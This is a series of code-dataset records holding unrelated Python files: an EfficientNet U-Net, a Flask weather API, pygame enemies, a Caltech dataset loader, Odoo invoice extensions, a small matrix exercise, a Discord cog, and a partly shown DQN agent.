'drop_connect_rate'])\nGlobalParams.__new__.__defaults__ = (None,) * len(GlobalParams._fields)\n\nBlockArgs = namedtuple('BlockArgs', ['kernel_size', 'num_repeat', 'input_filters', 'output_filters', 'expand_ratio',\n 'id_skip', 'strides', 'se_ratio'])\nBlockArgs.__new__.__defaults__ = (None,) * len(BlockArgs._fields)\n\ndef round_filters(filters, global_params):\n multiplier = global_params.width_coefficient\n divisor = global_params.depth_divisor\n min_depth = global_params.min_depth\n if not multiplier:\n return filters\n \n filters *= multiplier\n min_depth = min_depth or divisor\n new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)\n if new_filters < 0.9 * filters:\n new_filters += divisor\n return int(new_filters)\n\ndef round_repeats(repeats, global_params):\n multiplier = global_params.depth_coefficient\n if not multiplier:\n return repeats\n return int(math.ceil(multiplier * repeats))\n\ndef get_efficientnet_params(model_name, override_params=None):\n params_dict = {'efficientnet-b0': (1.0, 1.0, 224, 0.2)}\n if model_name not in params_dict.keys():\n raise KeyError\n \n width_coefficient, depth_coefficient, _, dropout_rate = params_dict[model_name]\n \n blocks_args = [\n 'r1_k3_s11_e1_i32_o16_se0.25', 'r2_k3_s22_e6_i16_o24_se0.25',\n 
'r2_k5_s22_e6_i24_o40_se0.25', 'r3_k3_s22_e6_i40_o80_se0.25',\n        'r3_k5_s11_e6_i80_o112_se0.25', 'r4_k5_s22_e6_i112_o192_se0.25',\n        'r1_k3_s11_e6_i192_o320_se0.25',\n    ]\n    global_params = GlobalParams(\n        batch_norm_momentum=0.99,\n        batch_norm_epsilon=1e-3,\n        dropout_rate=dropout_rate,\n        drop_connect_rate=0.2,\n        num_classes=1000,\n        width_coefficient=width_coefficient,\n        depth_coefficient=depth_coefficient,\n        depth_divisor=8,\n        min_depth=None)\n    \n    if override_params:\n        global_params = global_params._replace(**override_params)\n    \n    decoder = BlockDecoder()\n    return decoder.decode(blocks_args), global_params\n\nclass BlockDecoder(object):\n    \n    @staticmethod\n    def _decode_block_string(block_string):\n        \n        assert isinstance(block_string, str)\n        ops = block_string.split('_')\n        options = {}\n        for op in ops:\n            splits = re.split(r'(\\d.*)', op)\n            if len(splits) >= 2:\n                key, value = splits[:2]\n                options[key] = value\n        if 's' not in options or len(options['s']) != 2:\n            raise ValueError('strides option is missing or malformed')\n        \n        return BlockArgs(\n            kernel_size = int(options['k']),\n            num_repeat = int(options['r']),\n            input_filters = int(options['i']),\n            output_filters = int(options['o']),\n            expand_ratio = int(options['e']),\n            id_skip = ('noskip' not in block_string),\n            se_ratio = float(options['se']) if 'se' in options else None,\n            strides = [int(options['s'][0]), int(options['s'][1])]\n        )\n    \n    def decode(self, string_list):\n        \n        assert isinstance(string_list, list)\n        blocks_args = []\n        for block_string in string_list:\n            blocks_args.append(self._decode_block_string(block_string))\n        return blocks_args\n    \nclass EfficientNet(nn.Module):\n    \n    def __init__(self, block_args_list, global_params):\n        super().__init__()\n        \n        self.block_args_list = block_args_list\n        self.global_params = global_params\n        \n        batch_norm_momentum = 1-self.global_params.batch_norm_momentum\n        batch_norm_epsilon = self.global_params.batch_norm_epsilon\n        \n        in_channels = 3\n        out_channels = round_filters(32, self.global_params)\n        self._conv_stem = Conv2dSamepadding(in_channels,\n                                            out_channels,\n                                            kernel_size=3,\n                                            stride=2,\n                                            bias=False,\n                                            name='stem_conv')\n        self._bn0 = BatchNorm2d(num_features=out_channels,\n                                momentum=batch_norm_momentum,\n                                eps=batch_norm_epsilon,\n                                name='stem_batch_norm')\n        self._swish = Swish(name='swish')\n        \n        idx = 0\n        self._blocks = nn.ModuleList([])\n        for block_args in self.block_args_list:\n            \n            block_args = block_args._replace(\n                input_filters = round_filters(block_args.input_filters, self.global_params),\n                output_filters = round_filters(block_args.output_filters, self.global_params),\n                num_repeat = round_repeats(block_args.num_repeat, self.global_params)\n            )\n            \n            self._blocks.append(MBConvBlock(block_args, self.global_params, idx=idx))\n            idx += 1\n            \n            if block_args.num_repeat > 1:\n                block_args = block_args._replace(input_filters=block_args.output_filters, strides=1)\n                \n            for _ in range(block_args.num_repeat - 1):\n                self._blocks.append(MBConvBlock(block_args, self.global_params, idx=idx))\n                idx += 1\n        \n        # Head\n        in_channels = block_args.output_filters\n        out_channels = round_filters(1280, self.global_params)\n        self._conv_head = Conv2dSamepadding(in_channels,\n                                            out_channels,\n                                            kernel_size=1,\n                                            bias=False,\n                                            name='head_conv')\n        self._bn1 = BatchNorm2d(num_features=out_channels,\n                                momentum=batch_norm_momentum,\n                                eps=batch_norm_epsilon,\n                                name='head_batch_norm')\n        \n        # Final linear layer\n        self.dropout_rate = self.global_params.dropout_rate\n        self._fc = nn.Linear(out_channels, self.global_params.num_classes)\n    \n    def forward(self, x):\n        # Stem\n        x = 
self._conv_stem(x)\n        x = self._bn0(x)\n        x = self._swish(x)\n        \n        # Blocks\n        for idx, block in enumerate(self._blocks):\n            drop_connect_rate = self.global_params.drop_connect_rate\n            if drop_connect_rate:\n                drop_connect_rate *= idx / len(self._blocks)\n            x = block(x, drop_connect_rate)\n        \n        # Head\n        x = self._conv_head(x)\n        x = self._bn1(x)\n        x = self._swish(x)\n        \n        # Pooling and Dropout\n        x = F.adaptive_avg_pool2d(x, 1).squeeze(-1).squeeze(-1)\n        if self.dropout_rate > 0:\n            x = F.dropout(x, p=self.dropout_rate, training=self.training)\n        \n        # FC layer\n        x = self._fc(x)\n        return x\n    \n    @classmethod\n    def from_name(cls, model_name, *, n_classes=1000, pretrained=False):\n        return _get_model_by_name(model_name, classes=n_classes, pretrained=pretrained)\n    \n    @classmethod\n    def encoder(cls, model_name, *, pretrained=False):\n        model = cls.from_name(model_name, pretrained=pretrained)\n        \n        class Encoder(nn.Module):\n            def __init__(self):\n                super().__init__()\n                \n                self.name = model_name\n                \n                self.global_params = model.global_params\n                \n                self.stem_conv = model._conv_stem\n                self.stem_batch_norm = model._bn0\n                self.stem_swish = Swish(name='stem_swish')\n                self.blocks = model._blocks\n                self.head_conv = model._conv_head\n                self.head_batch_norm = model._bn1\n                self.head_swish = Swish(name='head_swish')\n                \n            def forward(self,x):\n                # stem\n                x = self.stem_conv(x)\n                x = self.stem_batch_norm(x)\n                x = self.stem_swish(x)\n                \n                # blocks\n                for idx, block in enumerate(self.blocks):\n                    drop_connect_rate = self.global_params.drop_connect_rate\n                    if drop_connect_rate:\n                        drop_connect_rate *= idx / len(self.blocks)\n                    x = block(x, drop_connect_rate)\n                \n                # head\n                x = self.head_conv(x)\n                x = self.head_batch_norm(x)\n                x = self.head_swish(x)\n                return x\n        \n        return Encoder()\n    # classmethod custom_head omitted\n    \ndef _get_model_by_name(model_name, classes=1000, pretrained=False):\n    block_args_list, global_params = get_efficientnet_params(model_name, override_params={'num_classes': classes})\n    model = EfficientNet(block_args_list, global_params)\n    try:\n        if pretrained:\n            print('pretrained?')\n    except KeyError as e:\n        print(f'Note: Currently model {e} does not have pretrained weights')\n    return model\n\nfrom collections import OrderedDict\n\ndef get_blocks_to_be_concat(model, x):\n    shapes = set()\n    blocks = OrderedDict()\n    hooks = []\n    count = 0\n    \n    def register_hook(module):\n        \n        def hook(module, input, output):\n            try:\n                nonlocal count\n                if module.name == f'blocks_{count}_output_batch_norm':\n                    count +=1\n                    shape = output.size()[-2:]\n                    if shape not in shapes:\n                        shapes.add(shape)\n                        blocks[module.name] = output\n                elif module.name == 'head_swish':\n                    blocks.popitem()\n                    blocks[module.name] = output\n            except AttributeError:\n                pass\n        if (\n            not isinstance(module, nn.Sequential)\n            and not isinstance(module, nn.ModuleList)\n            and not (module == model)\n        ):\n            hooks.append(module.register_forward_hook(hook))\n    model.apply(register_hook)\n    \n    model(x)\n    \n    for h in hooks:\n        h.remove()\n    return blocks\n\n\nclass EfficientUnet(nn.Module):\n    def __init__(self, encoder, out_channels=2, concat_input=True):\n        super().__init__()\n        \n        self.encoder = encoder\n        self.concat_input = concat_input\n        \n        self.up_conv1 = up_conv(self.n_channels, 512)\n        self.double_conv1 = double_conv(self.size[0], 512)\n        self.up_conv2 = up_conv(512, 256)\n        self.double_conv2 = double_conv(self.size[1], 256)\n        self.up_conv3 = up_conv(256, 128)\n        self.double_conv3 = double_conv(self.size[2], 128)\n        self.up_conv4 = up_conv(128, 64)\n        self.double_conv4 = double_conv(self.size[3], 64)\n        \n        if self.concat_input:\n            
self.up_conv_input = up_conv(64, 32)\n self.double_conv_input = double_conv(self.size[4], 32)\n \n self.final_conv = nn.Conv2d(self.size[5], out_channels, kernel_size=1)\n \n @property\n def n_channels(self):\n # only for efficientnet-b0 version\n return 1280\n \n @property\n def size(self):\n # only for efficientnet-b0 version\n return [592, 296, 152, 80, 35, 32]\n \n def forward(self,x):\n input_ = x\n \n blocks = get_blocks_to_be_concat(self.encoder, x)\n _, x = blocks.popitem()\n \n x = self.up_conv1(x)\n x = torch.cat([x, blocks.popitem()[1]], dim=1)\n x = self.double_conv1(x)\n \n x = self.up_conv2(x)\n x = torch.cat([x, blocks.popitem()[1]], dim=1)\n x = self.double_conv2(x)\n \n x = self.up_conv3(x)\n x = torch.cat([x, blocks.popitem()[1]], dim=1)\n x = self.double_conv3(x)\n \n x = self.up_conv4(x)\n x = torch.cat([x, blocks.popitem()[1]], dim=1)\n x = self.double_conv4(x)\n \n if self.concat_input:\n x = self.up_conv_input(x)\n x = torch.cat([x, input_], dim=1)\n x = self.double_conv_input(x)\n \n x = self.final_conv(x)\n \n return x\n \ndef get_efficientunet_b0(out_channels=2, concat_input=True, pretrained=False):\n encoder = EfficientNet.encoder('efficientnet-b0', pretrained=pretrained)\n model = EfficientUnet(encoder, out_channels=out_channels, concat_input=concat_input)\n return model\n","repo_name":"TransferHee/Heart_Disease","sub_path":"efficientunet.py","file_name":"efficientunet.py","file_ext":"py","file_size_in_byte":20315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"22937034309","text":"import json\nimport numpy as np\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\nimport datetime as dt\n\n#Database setup\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n#Mirror mirror on the wall, can we reflect at all?\nBase = automap_base()\nBase.prepare(engine, reflect=True)\n\n#Saving references to objects\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n#Flask setup\napp = Flask(__name__)\n\n#Flask routes\n@app.route(\"/\")\ndef welcome():\n    \"\"\"List available api routes\"\"\"\n    return (\n        f\"Available routes:<br>\"\n        f\"/api/v1.0/precipitation<br>\"\n        f\"/api/v1.0/stations<br>\"\n        f\"/api/v1.0/tobs<br>\"\n        f\"/api/v1.0/start<br>\"\n        f\"/api/v1.0/start/end\"\n    )\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n    #Create session\n    session = Session(engine)\n\n    \"\"\"Return a list of dates and precipitation\"\"\"\n    #Query all precipitation\n    results = session.query(Measurement.date,Measurement.prcp).all()\n\n    session.close()\n\n    #Convert list of tuples into normal list\n    all_dates_prcp = []\n    for date, precip in results:\n        date_dict = {}\n        date_dict[date] = precip\n        all_dates_prcp.append(date_dict)\n    return jsonify(all_dates_prcp)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n    #Create session\n    session = Session(engine)\n\n    \"\"\"Return a list of stations\"\"\"\n    #Query all stations\n    results = session.query(Station.station, Station.name).all()\n\n    session.close()\n\n    #Convert list of tuples into normal list.\n    all_stations = list(np.ravel(results))\n\n    return jsonify(all_stations)\n\n#Query for dates and temps from a year from the last data point\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n    # Create our session (link) from Python to the DB\n    session = Session(engine)\n\n    \"\"\"Return a list of tobs for 
the last year of data in the table\"\"\"\n query_date = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n\n results = session.query(Measurement.station, Measurement.tobs).\\\n filter(Measurement.date >= query_date).all()\n \n session.close()\n\n # Convert list of tuples into normal list\n all_tobs = list(np.ravel(results))\n\n return jsonify(all_tobs)\n\n#Create function to validate input as a specific date format -- YYYY-MM-DD\ndef validate(date_text):\n try:\n dt.datetime.strptime(date_text, '%Y-%m-%d')\n except ValueError:\n raise ValueError(\"Oops, incorrect date format, should be YYYY-MM-DD\")\n\n#When provided the start date only, calculate the tmin, tavg, & tmax for all date greater than or equal to the start date\n@app.route(\"/api/v1.0/<startDate>\")\ndef temp_date_end(startDate):\n \"\"\"Fetch the tmin, tavg, tmax given a start date, variables provided by the user or a 404 if not.\"\"\"\n\n if isinstance(startDate,str):\n print(f\"A date passed, determine aggregate functions over date range\")\n validate(startDate)\n #Create session\n session = Session(engine)\n\n results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), \\\n func.max(Measurement.tobs)).filter(Measurement.date >= startDate).first()\n \n session.close()\n\n #Convert to list\n agg_temps = list(np.ravel(results))\n return jsonify(agg_temps)\n return jsonify({\"error\": \"Date(s) not found.\"}), 404\n\n#When provided the start & end date -- separated by \"/\" -- calculate the tmin, tavg, & tmax for selected dates\n@app.route(\"/api/v1.0/<startDate>/<endDate>\")\ndef temp_date_range(startDate,endDate):\n \"\"\"Fetch the tmin, tavg, and tmax given a date range\"\"\"\n\n if isinstance(endDate,str):\n print(f\"Both dates passed, determine the aggregates\")\n validate(startDate)\n validate(endDate)\n\n #Create session\n session = Session(engine)\n\n results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), \\\n func.max(Measurement.tobs)).filter(Measurement.date >= startDate).filter(Measurement.date <= endDate).first()\n \n session.close()\n\n #Convert to list\n agg_temps = list(np.ravel(results))\n\n return jsonify(agg_temps)\n return jsonify({\"error\": \"Date(s) not found.\"}), 404\n \nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"tlenzmeier58/sqlalchemy_challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"18311237545","text":"import pygame\nfrom random import seed, randint, uniform\n\nfrom help_functions import calculate_unit_vector\n\nclass Enemy():\n \"\"\"class controlls enemys\"\"\"\n def __init__(self, screen, settings):\n \"\"\"create enemy object and load params\"\"\"\n #load image \n self.screen = screen\n self.settings = settings\n self.image = pygame.image.load(settings.image_path + settings.file_prefix + settings.enemy_path)\n self.image_damaged = pygame.image.load(settings.image_path + settings.file_prefix + settings.enemy_damaged_path)\n self.rect = self.image.get_rect()\n #coordinates\n seed()\n self.rect.centerx = randint(0, settings.screen_size[0])\n self.rect.centery = randint(0, settings.screen_size[1])\n self.centerx = float(self.rect.centerx)\n self.centery = float(self.rect.centery)\n #params (hp, speed)\n self.hp = settings.enemy_hp\n self.being_damaged = 0\n self.speed = settings.enemy_speed \n self.damage = settings.enemy_damage\n\n def show(self):\n \"\"\"show enemy\"\"\" \n if 
self.being_damaged > 0:\n self.screen.blit(self.image_damaged, self.rect)\n self.being_damaged -= 1\n else:\n self.screen.blit(self.image, self.rect) \n\n def take_damage(self, damage):\n \"\"\"take damage from bullet\"\"\"\n self.hp -= damage\n self.being_damaged = self.settings.damage_frame_time\n\n def update(self, ship):\n \"\"\"move enemy\"\"\"\n #search hero ship\n move_vector = calculate_unit_vector(self.centerx, self.centery, ship.centerx + uniform(-10, 10), ship.centery + uniform(-10, 10))\n self.centerx += move_vector[0] * self.speed\n self.centery += move_vector[1] * self.speed\n self.rect.centerx = self.centerx\n self.rect.centery = self.centery\n\nclass EnemyFast(Enemy):\n \"\"\"faster enemy class\"\"\"\n def __init__(self, screen, settings):\n super().__init__(screen, settings)\n self.hp = settings.enemy_hp / 2\n self.speed = settings.enemy_speed * 2\n self.image = pygame.transform.rotozoom(self.image, 0, 0.5)\n self.image_damaged = pygame.transform.rotozoom(self.image_damaged, 0, 0.5)\n self.rect = self.image.get_rect()\n\nclass EnemyFat(Enemy):\n \"\"\"bigger enemy class\"\"\"\n def __init__(self, screen, settings):\n super().__init__(screen, settings)\n self.hp = settings.enemy_hp * 2\n self.speed = settings.enemy_speed / 0.75\n self.image = pygame.transform.rotozoom(self.image, 0, 1.5)\n self.image_damaged = pygame.transform.rotozoom(self.image_damaged, 0, 1.5)\n self.rect = self.image.get_rect()\n\nclass EnemyBoss(Enemy):\n \"\"\"boss enemy class\"\"\"\n def __init__(self, screen, settings):\n super().__init__(screen, settings)\n self.hp = settings.enemy_hp * 10\n self.speed = settings.enemy_speed / 0.75\n self.image = pygame.transform.rotozoom(self.image, 0, 3)\n self.image_damaged = pygame.transform.rotozoom(self.image_damaged, 0, 3)\n self.rect = self.image.get_rect()\n def update(self, ship):\n pass\n","repo_name":"pinguingman/swiborg-shoot","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"10093669526","text":"import cPickle\nimport os\nfrom os import path\nimport shutil\nfrom glob import glob\nimport hashlib\n\nimport numpy as np\n\nimport larray\nfrom data_home import get_data_home\nfrom utils import download, extract, int_labels\nfrom utils.image import ImgLoader\n\n\nclass BaseCaltech(object):\n    \"\"\"Caltech Object Dataset\n\n    Attributes\n    ----------\n    meta: list of dict\n        Metadata associated with the dataset. For each image with index i,\n        meta[i] is a dict with keys:\n            name: str\n                Name of the individual's face in the image.\n            filename: str\n                Full path to the image.\n            id: int\n                Identifier of the image.\n            sha1: str\n                SHA-1 hash of the image.\n\n    Notes\n    -----\n    If joblib is available, then `meta` will be cached for faster\n    processing. 
To install joblib use 'pip install -U joblib' or\n 'easy_install -U joblib'.\n \"\"\"\n\n def __init__(self, meta=None, seed=0, ntrain=15, ntest=15, num_splits=10):\n\n self.seed = seed\n self.ntrain = ntrain\n self.ntest = ntest\n self.num_splits = num_splits\n\n if meta is not None:\n self._meta = meta\n\n self.name = self.__class__.__name__\n\n try:\n from joblib import Memory\n mem = Memory(cachedir=self.home('cache'))\n self._get_meta = mem.cache(self._get_meta)\n except ImportError:\n pass\n\n def home(self, *suffix_paths):\n return path.join(get_data_home(), self.name, *suffix_paths)\n\n # ------------------------------------------------------------------------\n # -- Dataset Interface: fetch()\n # ------------------------------------------------------------------------\n\n def fetch(self, download_if_missing=True):\n \"\"\"Download and extract the dataset.\"\"\"\n\n home = self.home()\n\n if not download_if_missing:\n raise IOError(\"'%s' exists!\" % home)\n\n # download archive\n url = self.URL\n sha1 = self.SHA1\n basename = path.basename(url)\n archive_filename = path.join(home, basename)\n if not path.exists(archive_filename):\n if not download_if_missing:\n return\n if not path.exists(home):\n os.makedirs(home)\n download(url, archive_filename, sha1=sha1)\n\n # extract it\n if not path.exists(self.home(self.SUBDIR)):\n extract(archive_filename, home, sha1=sha1, verbose=True)\n\n # ------------------------------------------------------------------------\n # -- Dataset Interface: meta\n # ------------------------------------------------------------------------\n\n @property\n def meta(self):\n if not hasattr(self, '_meta'):\n self.fetch(download_if_missing=True)\n self._meta = self._get_meta()\n self.names = sorted(os.listdir(self.home(self.SUBDIR)))\n return self._meta\n\n def _get_meta(self):\n try:\n rval = cPickle.load(\n open(\n self.home(self.SUBDIR + '.meta.pkl')))\n open(rval[0]['filename'])\n return rval\n except IOError:\n # IOError may come either from a missing pkl file\n # or from a missing image (rval[0]['filename']) but in both\n # cases the response is to rebuild the metadata\n names = sorted(os.listdir(self.home(self.SUBDIR)))\n\n meta = []\n ind = 0\n\n for name in names:\n\n pattern = self.home(self.SUBDIR, name, '*.jpg')\n\n img_filenames = sorted(glob(pattern))\n\n for img_filename in img_filenames:\n img_data = open(img_filename, 'rb').read()\n sha1 = hashlib.sha1(img_data).hexdigest()\n\n data = dict(name=name,\n id=ind,\n filename=img_filename,\n sha1=sha1)\n\n meta.append(data)\n ind += 1\n\n cPickle.dump(\n meta,\n open(self.home(self.SUBDIR + '.meta.pkl'), 'w'))\n\n return meta\n\n @property\n def splits(self):\n \"\"\"\n generates splits and attaches them in the \"splits\" attribute\n\n \"\"\"\n if not hasattr(self, '_splits'):\n seed = self.seed\n ntrain = self.ntrain\n ntest = self.ntest\n num_splits = self.num_splits\n self._splits = self.generate_splits(seed, ntrain,\n ntest, num_splits)\n return self._splits\n\n def generate_splits(self, seed, ntrain, ntest, num_splits):\n meta = self.meta\n ntrain = self.ntrain\n ntest = self.ntest\n rng = np.random.RandomState(seed)\n splits = {}\n for split_id in range(num_splits):\n splits['train_' + str(split_id)] = []\n splits['test_' + str(split_id)] = []\n for name in self.names:\n cat = [m for m in meta if m['name'] == name]\n L = len(cat)\n assert L >= ntrain + ntest, 'category %s too small' % name\n perm = rng.permutation(L)\n for ind in perm[:ntrain]:\n splits['train_' + 
str(split_id)].append(cat[ind]['id'])\n for ind in perm[ntrain: ntrain + ntest]:\n splits['test_' + str(split_id)].append(cat[ind]['id'])\n return splits\n\n # ------------------------------------------------------------------------\n # -- Dataset Interface: clean_up()\n # ------------------------------------------------------------------------\n\n def clean_up(self):\n if path.isdir(self.home()):\n shutil.rmtree(self.home())\n\n # ------------------------------------------------------------------------\n # -- Standard Tasks\n # ------------------------------------------------------------------------\n\n def raw_classification_task(self, split=None):\n \"\"\"Return image_paths, labels\"\"\"\n if split:\n inds = self.splits[split]\n else:\n inds = xrange(len(self.meta))\n image_paths = [self.meta[ind]['filename'] for ind in inds]\n names = [self.meta[ind]['name'] for ind in inds]\n labels = np.searchsorted(self.names, names)\n return image_paths, labels\n\n def img_classification_task(self, dtype='uint8', split=None):\n img_paths, labels = self.raw_classification_task(split=split)\n imgs = larray.lmap(ImgLoader(ndim=3, dtype=dtype, mode='RGB'),\n img_paths)\n return imgs, labels\n\n\nclass Caltech101(BaseCaltech):\n URL = ('http://www.vision.caltech.edu/Image_Datasets/'\n 'Caltech101/101_ObjectCategories.tar.gz')\n SHA1 = 'b8ca4fe15bcd0921dfda882bd6052807e63b4c96'\n SUBDIR = '101_ObjectCategories'\n\n\nclass Caltech256(BaseCaltech):\n URL = ('http://www.vision.caltech.edu/Image_Datasets/'\n 'Caltech256/256_ObjectCategories.tar')\n SHA1 = '2195e9a478cf78bd23a1fe51f4dabe1c33744a1c'\n SUBDIR = '256_ObjectCategories'\n","repo_name":"jaberg/skdata","sub_path":"skdata/caltech.py","file_name":"caltech.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","stars":475,"dataset":"github-code","pt":"57"} +{"seq_id":"25250654819","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nfrom num2words import num2words\n\n\nclass AccountInvoice(models.Model):\n _inherit = \"account.invoice\"\n _description = \"Invoice\"\n\n @api.multi\n def amount_to_word(self, amount):\n return num2words(amount, lang='en').title()\n\n\nclass AccountBankStatement(models.Model):\n _inherit = \"account.bank.statement\"\n\n referenceRecive = fields.Char(string='R Reference', states={'open': [('readonly', False)]}, copy=False,\n readonly=True,\n help=\"Used to hold the reference of the external mean that created this statement (name of imported file, reference of online synchronization...)\")\n \nclass AccountInvoiceLine(models.Model):\n _inherit = 'account.invoice.line'\n\n imw_qty = fields.Float(string='Quantity')\n imw_measurement = fields.Float(string='Measurement',default=1)\n category_id = fields.Many2one('product.category', 'category')\n otherUnitMeasure = fields.Many2one('uom.uom', 'Other Unit of Measure')\n\n# Adding Reference 2 field in Model account.move as an optional field dtd:2019-06-26\nclass JournalEntriesRef2(models.Model):\n _inherit='account.move'\n\n imw_ref2=fields.Char('Reference2')\n\n\n @api.multi\n @api.onchange('imw_qty', 'imw_measurement')\n def _ChangeQty(self):\n if float(self.imw_measurement) == 0:\n self.imw_measurement = 1\n\n self.quantity = float(self.imw_qty) * float(self.imw_measurement)\n\n\n\n\n\n\n @api.multi\n @api.onchange('product_id')\n def _onchangeProductId(self):\n self.otherUnitMeasure = 
self.product_id.otherUnitMeasure\n\n if float(self.imw_qty) == 0:\n self.imw_qty = 1\n\n if float(self.imw_measurement) == 0:\n self.imw_measurement = 1\n # self.product_uom_qty = float(self.imw_qty) * float(self.imw_measurement)\n imwQty = float(self.imw_qty) if float(self.imw_qty) > 0 else 1\n self.imw_measurement = float(self.quantity) / imwQty\n\n\n","repo_name":"International-Marine-Works/IMW","sub_path":"imw__customization/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7293750754","text":"def create_matrix():\n rows, columns = [int(x) for x in input().split()]\n demo_matrix = []\n for row in range(rows):\n elements = [x for x in input().split()]\n demo_matrix.append(elements)\n return demo_matrix, columns\n\n\ndef search_equal_cells(copy_matrix, column_len):\n count = 0\n for i_row in range(len(copy_matrix) - 1):\n for i_column in range(column_len - 1):\n if copy_matrix[i_row][i_column] == copy_matrix[i_row][i_column + 1] == copy_matrix[i_row + 1][i_column] == \\\n copy_matrix[i_row + 1][i_column + 1]:\n count += 1\n return count\n\n\nmatrix, column_size = create_matrix()\nsearch_2x2 = search_equal_cells(matrix, column_size)\nprint(search_2x2)\n","repo_name":"alexanderivanov2/Softuni-Software-Engineering","sub_path":"Python Advanced/3. Multidimensional Lists/2x2_squares_in_matrix.py","file_name":"2x2_squares_in_matrix.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"5696816170","text":"from nextcord.ext import commands\n\nclass Info(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n\n @commands.command()\n @commands.cooldown(1, 5, commands.BucketType.member) # Cooldown\n async def ping(self, ctx):\n await ctx.reply('Pong !')\n\n\ndef setup(bot):\n bot.add_cog(Info(bot))","repo_name":"ZI1E/Nextcord-Template","sub_path":"cogs/Info.py","file_name":"Info.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"70675942898","text":"import random\nfrom collections import namedtuple\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision.models as models\nimport copy\n\nTransition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))\n\n\nclass ReplayMemory(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n \"\"\"Saves a transition.\"\"\"\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Transition(*args)\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\nclass DeepQNetwork(nn.Module):\n def __init__(self, n_past_action_to_remember=10):\n super(DeepQNetwork, self).__init__()\n self.model = nn.Sequential(\n nn.Linear(4096 + 9 * n_past_action_to_remember, 1024),\n nn.ReLU(),\n nn.Linear(1024, 1024),\n nn.ReLU(),\n nn.Linear(1024, 9)\n )\n\n def forward(self, x):\n return self.model(x)\n\n\nclass Agent:\n def __init__(self, env,\n target_update=10,\n discout_rate=0.99,\n eps_start=0.9,\n eps_end=0.05,\n eps_decay=5,\n batch_size=64,\n memory_size=1000,\n n_past_action_to_remember=10,\n 
device=None,\n save_path=\"\"):\n self.target_update = target_update\n self.discount_rate = discout_rate\n self.n_action = env.action_space.n\n self.batch_size = batch_size\n self.n_past_action_to_remember = n_past_action_to_remember\n\n self.eps_start = eps_start\n self.eps_end = eps_end\n self.eps_decay = eps_decay\n\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") if device == None else device\n self.pretrained_cnn = self.get_pretrained_cnn()\n\n self.memory_size = memory_size\n self.policy_q_net = DeepQNetwork(n_past_action_to_remember).to(self.device)\n self.target_q_net = DeepQNetwork(n_past_action_to_remember).to(self.device)\n self.target_q_net.load_state_dict(self.policy_q_net.state_dict())\n self.target_q_net.eval()\n\n self.optimizer = optim.Adam(self.policy_q_net.parameters())\n self.memory = ReplayMemory(memory_size)\n\n self.timestep_until_last_trigger_treshold = 40\n\n self.optimization_steps_since_last_update = 0\n self.current_epoch = 0\n self.t = 0\n self.history = self.clear_history()\n self.save_path = save_path\n print(\"Agent initialization done\")\n\n # def save_model(self, path):\n # torch.save(self.policy_q_net.state_dict(), os.path.join(path, 'best_policy_q_net.pt'))\n #\n # def load_model(self, path):\n # self.policy_q_net.load_state_dict(torch.load(path, map_location=self.device))\n # self.target_q_net.load_state_dict(torch.load(path, map_location=self.device))\n\n def get_pretrained_cnn(self):\n pretrained_cnn = models.vgg16(pretrained=True)\n pretrained_cnn.classifier = nn.Sequential(*list(pretrained_cnn.classifier.children())[:-5])\n for param in pretrained_cnn.parameters():\n param.requires_grad = False\n return pretrained_cnn.to(self.device)\n\n def get_greedy_action(self, state):\n return self.policy_q_net(state).max(1)[1].view(1, 1)\n\n def get_epsilon_for_epsilon_greedy_policy(self, t):\n linear_decay = self.eps_start - (self.eps_start - self.eps_end) / self.eps_decay * t\n return max(linear_decay, self.eps_end)\n\n def get_action(self, state, env):\n threshold = self.get_epsilon_for_epsilon_greedy_policy(t=self.current_epoch)\n\n if random.random() > threshold:\n with torch.no_grad():\n return self.get_greedy_action(state)\n else:\n # positive_rewards=[]\n positive_rewards = env.positive_reward_actions()\n # print(\"positive_rewards\", positive_rewards)\n if len(positive_rewards) != 0:\n action = random.choice(positive_rewards)\n else:\n action = random.randrange(self.n_action)\n return torch.tensor([[action]], device=self.device, dtype=torch.long)\n\n def optimize_model(self):\n\n if len(self.memory) < self.batch_size:\n return\n # print(\"OPTIMIZING MODEL\")\n if self.optimization_steps_since_last_update == self.target_update:\n self.optimization_steps_since_last_update = 